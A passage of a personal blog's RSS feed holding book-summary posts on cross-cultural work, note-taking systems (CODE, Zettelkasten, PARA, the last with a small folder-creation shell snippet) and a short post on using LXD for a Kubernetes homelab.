<p>Reading <em>The Culture Map</em> didn't give me a cheat sheet for every cross-cultural interaction. What it gave me was something more useful: <strong>a framework for noticing</strong>. Instead of attributing someone's behavior to their personality or assuming bad intent, I now ask myself where their culture might sit on these eight scales — and how that compares to my own defaults.</p>
<p>A few principles I'm trying to internalize:</p>
<p><strong>Differences are relative, not absolute.</strong> Don't label a culture as "direct" or "hierarchical" in isolation — only as more or less so <em>compared to your own</em>.</p>
<p><strong>Adaptation should be gradual.</strong> Overcorrecting or mimicking another culture can backfire spectacularly. Move slowly.</p>
<p><strong>Multi-cultural teams need low-context processes.</strong> When in doubt, be more explicit, put more in writing, and assume less shared context.</p>
<p><strong>Sometimes understanding is enough.</strong> Just recognizing that a behavior is cultural — that it's different, not wrong — can prevent a misunderstanding from becoming a conflict.</p>
<p>Style-switching across these dimensions is, as Meyer puts it, an essential skill for today's global worker. It's not about losing your cultural identity. It's about expanding your range.</p>
<hr />
<p><em>Based on my notes from</em> The Culture Map <em>by Erin Meyer.</em></p>
]]></content:encoded></item><item><title><![CDATA[How I Offloaded My Mental Clutter and Achieved Super Clarity]]></title><description><![CDATA[We consume A LOT of info everyday. But the reality is, our short term memory is very limited—we can only hold up to 7 items at a point of time.
If you've ever read an amazing book or taken a course, o]]></description><link>https://blog.prakyath.dev/how-i-offloaded-my-mental-clutter-and-achieved-super-clarity</link><guid isPermaLink="true">https://blog.prakyath.dev/how-i-offloaded-my-mental-clutter-and-achieved-super-clarity</guid><category><![CDATA[pkm]]></category><category><![CDATA[secondbrain]]></category><category><![CDATA[#toolsforthought]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Fri, 27 Feb 2026 03:17:19 GMT</pubDate><content:encoded><![CDATA[<p>We consume a LOT of information every day. But our short-term memory is very limited: we can hold only about seven items at a time.</p>
<p>If you've ever read an amazing book or taken a course, only to completely forget the details a month later, you know this pain. As Tiago Forte puts it: <strong>The mind is for having ideas, not for storing them</strong>.</p>
<p>To fix this, I recently took a course by Mischa van den Berg, which inspired me to dive into three foundational books: <em>The PARA Method</em> and <em>Building a Second Brain</em> by Tiago Forte, and <em>How to Take Smart Notes</em> by Sönke Ahrens.</p>
<p>By combining the philosophies from these authors, I'm building a system to achieve super clarity of mind and ensure I never lose a good idea again. Here is how my new system works.</p>
<h3>1. The CODE Framework: Managing the Flow (Credit: <em>Building a Second Brain</em>)</h3>
<p>Tiago Forte introduces the <strong>CODE</strong> methodology to prevent digital hoarding and make your notes actually useful.</p>
<ul>
<li><p><strong>Capture:</strong> Keep what resonates, but capture only the genuinely noteworthy items so they don't end up spamming your notes.</p>
</li>
<li><p><strong>Organize:</strong> Information should be organized based on <em>how actionable it is</em>, not <em>what kind of information it is</em>. Don't organize things based on where they came from, but on where they're going, i.e., the outcomes they will help you realize. <em>(Note: Forte's PARA method is the perfect folder structure for this step!)</em></p>
</li>
<li><p><strong>Distill:</strong> Distill your notes down to their essence so your future self can read one line and recall the concept. You can do this through progressive summarization: Captured notes -&gt; Bolded passages -&gt; Highlighted passages -&gt; Executive summary.</p>
</li>
<li><p><strong>Express:</strong> Share your knowledge, ideas, or presentations with the world.</p>
</li>
</ul>
<h3>2. The Zettelkasten Method: Taking Smart Notes (Credit: <em>How to Take Smart Notes</em>)</h3>
<p>While CODE gives you the broad structure, Sönke Ahrens explains exactly <em>how</em> to write the notes using a "slip-box" or Zettelkasten method.</p>
<ul>
<li><p><strong>Fleeting notes:</strong> Just write down what's in your head in the inbox folder, without worrying about how, where or why.</p>
</li>
<li><p><strong>Literature notes:</strong> While reading, be extremely selective, avoid copy-pasting, and write on your own to force an understanding.</p>
</li>
<li><p><strong>Permanent notes:</strong> Think about how the new information relates to your existing notes (does it contradict, correct, or support them?). Write exactly as if you were writing for someone else: use full sentences and be precise.</p>
</li>
</ul>
<h3>3. The Power of Connecting (Bottom-Up vs. Top-Down)</h3>
<p>Both Ahrens and Forte emphasize building connections. The biggest mindset shift for me was moving from a top-down "planner" to a bottom-up "expert".</p>
<p>Usually, we plan an outline for a project and then look for data to support it, which makes us prone to confirmation bias. Instead, the bottom-up approach suggests we learn what interests us deeply, connect notes within our slip box, and let the project emerge naturally over time.</p>
<p>Our ability to remember things for the long term depends on how interconnected they are. When we bring diverse kinds of material into one place, we start identifying unusual connections and recognizing relationships, which makes us more creative.</p>
<h3>Secret Weapons for Daily Work</h3>
<p>I've also adopted a few incredible techniques from Forte's book to make executing my work completely frictionless:</p>
<ul>
<li><p><strong>The Hemingway Bridge:</strong> Before calling it a day on something you are working on, take a moment to note down what you'll do next and when you plan to resume. This creates a bridge to your next session and makes it much easier to pick up where you left off.</p>
</li>
<li><p><strong>Archipelago of Ideas:</strong> Divergently gather all the sources, points, etc., that form the backbone of your essay, presentation or deliverable. Once you achieve a critical mass of ideas, decisively switch over to Convergence mode and link them together in an order that makes sense.</p>
</li>
</ul>
<p>A good note-taking system will make me look well-prepared for any meeting I join or presentation I give. I highly recommend checking out Mischa's course and picking up these books if you want to stop relying on a fragile memory and start building a system that actually works.</p>
]]></content:encoded></item><item><title><![CDATA[The PARA Method - My Key Takeaways]]></title><description><![CDATA[If you are anything like me, your digital life often feels like a mix of vague long-term goals and a hoarding problem. We consume information, save PDFs, and bookmark articles, but we rarely use them.
I recently read The PARA Method by Tiago Forte, a...]]></description><link>https://blog.prakyath.dev/the-para-method-my-key-takeaways</link><guid isPermaLink="true">https://blog.prakyath.dev/the-para-method-my-key-takeaways</guid><category><![CDATA[book summary]]></category><category><![CDATA[Productivity]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Wed, 18 Feb 2026 11:50:28 GMT</pubDate><content:encoded><![CDATA[<p>If you are anything like me, your digital life often feels like a mix of vague long-term goals and a hoarding problem. We consume information, save PDFs, and bookmark articles, but we rarely <em>use</em> them.</p>
<p>I recently read <em>The PARA Method</em> by Tiago Forte, and it offered a solution that actually sticks. It isn't just about tidying up files; it's about organizing information for <strong>actionability</strong>.</p>
<p>Here is how the system works and the key habits I’m adopting to stop the digital clutter.</p>
<h4 id="heading-what-is-para">What is PARA?</h4>
<p>The system breaks everything down into four primary categories based on how actionable the information is right now:</p>
<ol>
<li><p><strong>Projects:</strong> Short-term efforts with a deadline (e.g., "Complete Website Redesign").</p>
</li>
<li><p><strong>Areas:</strong> Long-term responsibilities without a deadline (e.g., "Health," "Finances").</p>
</li>
<li><p><strong>Resources:</strong> Topics or interests that might be useful in the future (e.g., "Web Design," "Cooking").</p>
</li>
<li><p><strong>Archives:</strong> Inactive items from the other three categories.</p>
</li>
</ol>
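<p>For anyone who wants to try this on disk, the four categories map naturally onto a small folder tree. Here's a minimal sketch (the folder and project names are just illustrative, not from the book):</p>

```shell
# Create the four PARA top-level folders, numbered by actionability.
mkdir -p ~/notes/01-projects ~/notes/02-areas ~/notes/03-resources ~/notes/04-archives

# Projects are concrete and deadline-bound, so each gets its own subfolder.
mkdir -p ~/notes/01-projects/website-redesign

# When a project wraps up, move it whole into Archives.
mv ~/notes/01-projects/website-redesign ~/notes/04-archives/
```

<p>The same four folders can be mirrored in your notes app, cloud drive, and bookmarks, so every tool shares one structure.</p>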
<h4 id="heading-the-aha-moment-projects-vs-areas">The "Aha!" Moment: Projects vs. Areas</h4>
<p>The biggest takeaway for me was distinguishing between <strong>Projects</strong> and <strong>Areas</strong>. We often feel overwhelmed because we treat ongoing responsibilities (Areas) like they are tasks we can "finish." But you never "finish" Health or Finance.</p>
<ul>
<li><p><strong>Projects</strong> are concrete. They have boundaries and deadlines.</p>
</li>
<li><p><strong>Areas</strong> are the "hats you wear." They are the ongoing roles you maintain.</p>
</li>
</ul>
<p>By breaking vague goals down into specific projects, we ensure our daily work is actually aligned with our long-term goals.</p>
<h4 id="heading-the-flow-be-like-water">The Flow: Be Like Water</h4>
<p>A common mistake is thinking a file lives in one folder forever. PARA is designed to be fluid. Information should flow like water in a river.</p>
<p>Priorities change. If a "Resource" becomes relevant to a current task, move it to "Projects." When a project is done, move it to "Archives." The system is not rigid; it moves from <strong>more actionable</strong> to <strong>less actionable</strong> depending on what you are doing <em>right now</em>.</p>
<h4 id="heading-3-habits-to-make-it-stick">3 Habits to Make it Stick</h4>
<p>To keep the system from falling apart, Forte suggests three specific habits that I found really helpful:</p>
<ol>
<li><p><strong>Organize according to outcomes:</strong> Don't just file things away. Ask yourself, "Does this contribute to my current goals?".</p>
</li>
<li><p><strong>Organize Just-in-Time:</strong> Don't create folders for things you <em>might</em> need. Wait until you actually have something to put in them. Don't add anything until you are ready to work on it.</p>
</li>
<li><p><strong>Keep things informal:</strong> Don't over-engineer it with endless sub-folders. Some messiness is okay. As long as the <strong>Projects</strong> folder is clear, the rest can be a bit looser.</p>
</li>
</ol>
<h4 id="heading-the-anti-hoarding-mindset">The Anti-Hoarding Mindset</h4>
<p>Perhaps the hardest pill to swallow was this: <strong>Don't save everything.</strong> Saving every PDF or post "just in case" leads to digital hoarding that you will never revisit. PARA is meant to organize the life you have <em>now</em>, not the aspirational life you wish you had.</p>
<p>If you are feeling the weight of information overload or FOMO, I highly recommend giving this framework a shot. It helps you focus on one task at a time and actually finish what you start.</p>
<p><a target="_blank" href="https://www.linkedin.com/posts/prakyath-reddy-k_productivity-tiagoforte-paramethod-share-7429855118184914944-81Wd?utm_source=social_share_send&amp;utm_medium=member_desktop_web&amp;rcm=ACoAACMLB3QBbJrDnMx5HudIT1V1XUhI362E08o">LinkedIn Post</a></p>
]]></content:encoded></item><item><title><![CDATA[LXD vs Docker for Homelab]]></title><description><![CDATA[Why I chose LXD over Docker and VMs for my Kubernetes Homelab 🏗️☸️ ?  
I just set-up a 4-server k8s Homelab, and while my first choice was Docker for apps or Multi-pass/VMs for isolation, I went with LXD. Here’s why:  
1. 𝗩𝗠'𝘀 are too "Expensive"...]]></description><link>https://blog.prakyath.dev/lxd-vs-docker-for-homelab</link><guid isPermaLink="true">https://blog.prakyath.dev/lxd-vs-docker-for-homelab</guid><category><![CDATA[Devops]]></category><category><![CDATA[Docker]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Homelab]]></category><category><![CDATA[lxd]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Sun, 15 Feb 2026 16:40:06 GMT</pubDate><content:encoded><![CDATA[<p>Why I chose LXD over Docker and VMs for my Kubernetes Homelab 🏗️☸️ ?  </p>
<p>I just set up a 4-server k8s homelab, and while my first choice was Docker for apps or Multipass/VMs for isolation, I went with LXD. Here's why:</p>
<p>1. <strong>VMs</strong> are too "expensive": running four separate kernels wastes massive amounts of RAM.<br />Layers: Physical hardware ➡ Host OS ➡ Hypervisor (VMware) ➡ Guest OS<br />2. <strong>Docker</strong> is too "thin": K8s expects to manage a node, not just a process. Docker-in-Docker lacks the systemd init and robust networking required for a stable kubeadm environment.<br />Layers: Physical hardware ➡ Host OS kernel (shared) ➡ Docker Engine</p>
<p>The 𝗟𝗫𝗗 effect:<br />Layers: Physical hardware ➡ host OS Kernel (shared) ➡ LXD ➡ Full Guest OS<br />✅ Real Nodes: Each node has its own users, cron daemon, IP, storage, and systemd—essential for practicing kubeadm deployments.<br />✅ Instant Snapshots: I can snapshot the entire cluster before a risky kubectl upgrade and revert in seconds.<br />✅ Efficiency: I’m running a full 4-node cluster with less overhead than a single heavy Windows VM.  </p>
<p>You can follow my journey through this repository: <a target="_blank" href="https://lnkd.in/g5U-VZ7t"><strong>https://lnkd.in/g5U-VZ7t</strong></a><br /><a target="_blank" href="http://prakyath.dev/"><strong>prakyath.dev</strong></a><br /><a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23kubernetes&amp;origin=HASH_TAG_FROM_FEED"><strong>#Kubernetes</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23k8s&amp;origin=HASH_TAG_FROM_FEED"><strong>#K8s</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23lxd&amp;origin=HASH_TAG_FROM_FEED"><strong>#LXD</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23cloudnative&amp;origin=HASH_TAG_FROM_FEED"><strong>#CloudNative</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23homelab&amp;origin=HASH_TAG_FROM_FEED"><strong>#Homelab</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23ubuntu&amp;origin=HASH_TAG_FROM_FEED"><strong>#Ubuntu</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23devops&amp;origin=HASH_TAG_FROM_FEED"><strong>#DevOps</strong></a> <a target="_blank" href="https://www.linkedin.com/search/results/all/?keywords=%23linuxcontainers&amp;origin=HASH_TAG_FROM_FEED"><strong>#LinuxContainers</strong></a></p>
<p>LinkedIn: <a target="_blank" href="https://www.linkedin.com/posts/prakyath-reddy-k_kubernetes-k8s-lxd-activity-7422489779583488000-f2gP?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAACMLB3QBbJrDnMx5HudIT1V1XUhI362E08o">https://www.linkedin.com/posts/prakyath-reddy-k_kubernetes-k8s-lxd-activity-7422489779583488000-f2gP?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAACMLB3QBbJrDnMx5HudIT1V1XUhI362E08o</a></p>
]]></content:encoded></item></channel></rss>